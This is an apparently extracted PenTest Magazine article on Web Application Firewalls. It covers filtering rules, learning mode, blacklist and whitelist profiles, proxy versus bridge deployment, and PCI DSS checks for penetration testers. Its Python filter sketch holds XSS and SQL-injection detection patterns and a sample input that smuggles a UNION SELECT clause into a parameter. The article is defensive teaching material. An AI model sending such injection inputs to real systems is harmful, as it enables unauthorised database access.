After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2: An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; such profiles quickly become outdated due to the constant tuning needed to maintain them. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order-entry page.
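The combination of a site-wide templated blacklist with a learned whitelist guarding only a high-value sub-section might be sketched as follows; the signatures and the order-page profile are deliberately simplified, hypothetical examples:

```python
import re

# Templated negative security profile: known-bad patterns, checked everywhere.
BLACKLIST = [re.compile(p, re.I) for p in (
    r"<script\b",               # naive XSS signature
    r"\bunion\b.+\bselect\b",   # naive SQL injection signature
)]

# Whitelist profile learned for the high-value order-entry page only.
ORDER_WHITELIST = {
    "item_id": re.compile(r"^\d{1,6}$"),
    "qty":     re.compile(r"^\d{1,3}$"),
}

def allowed(url: str, params: dict) -> bool:
    blob = url + "&".join(f"{k}={v}" for k, v in params.items())
    # Blacklist applies to the whole site.
    if any(p.search(blob) for p in BLACKLIST):
        return False
    # Strict whitelist applies only to the order-entry sub-section.
    if url.startswith("/order"):
        return all(k in ORDER_WHITELIST and ORDER_WHITELIST[k].match(v)
                   for k, v in params.items())
    return True

print(allowed("/order/submit", {"item_id": "42", "qty": "2"}))                 # True
print(allowed("/order/submit", {"item_id": "42 UNION SELECT 1", "qty": "2"}))  # False
```

The rest of the site only pays the cost of the blacklist, so a change to an ordinary page does not force re-learning; only the order-entry profile needs maintenance.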
To prevent a high number of false positives, some manufacturers provide an exception profiler. It flags to the administrator entries that possibly violate the policies but can, based on an extensive heuristic analysis, still be categorized as legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from recurring.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as session spoofing or cross-site request forgery, which is not possible in Bridge Mode, and certain functions are only available in this mode. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which serves HTTP pages over HTTPS without requiring changes to the application code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, i.e. the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert denial-of-service attacks), as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured accordingly; penetration tests help with the correct configuration.
Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
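The URL translation and cloaking described above can be sketched as a pair of rewrite functions; the public host, backend address and paths are invented purely for the illustration:

```python
# Hypothetical mapping: public path prefix -> hidden backend URL.
PUBLIC_TO_BACKEND = {"/shop": "http://10.0.0.5:8080/legacy/orderapp"}

def rewrite_request(public_path: str) -> str:
    # Inbound: map the public URL onto the hidden backend URL.
    for prefix, backend in PUBLIC_TO_BACKEND.items():
        if public_path.startswith(prefix):
            return backend + public_path[len(prefix):]
    raise ValueError("no mapping for " + public_path)

def rewrite_response_header(location: str) -> str:
    # Outbound: scrub backend addresses out of e.g. a Location header,
    # so the real infrastructure stays concealed from the client.
    for prefix, backend in PUBLIC_TO_BACKEND.items():
        if location.startswith(backend):
            return "https://www.example.com" + prefix + location[len(backend):]
    return location

print(rewrite_request("/shop/cart"))
# http://10.0.0.5:8080/legacy/orderapp/cart
print(rewrite_response_header("http://10.0.0.5:8080/legacy/orderapp/checkout"))
# https://www.example.com/shop/checkout
```

The outbound rewrite is the cloaking half: even when the backend emits its own internal address, the client only ever sees the public name.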
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. Here the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or for the use of the web application; all other privileges are blocked. Integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center with which administrators can manage numerous other network and security products as well as the WAF. Administrators can then rely on familiar configuration procedures for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, should be secured by a WAF in Full Reverse Proxy mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data where the web application has weaknesses that the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's Web application security and application delivery product lines. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest Magazine:

Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation, namely in the online gambling industry
Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply asap.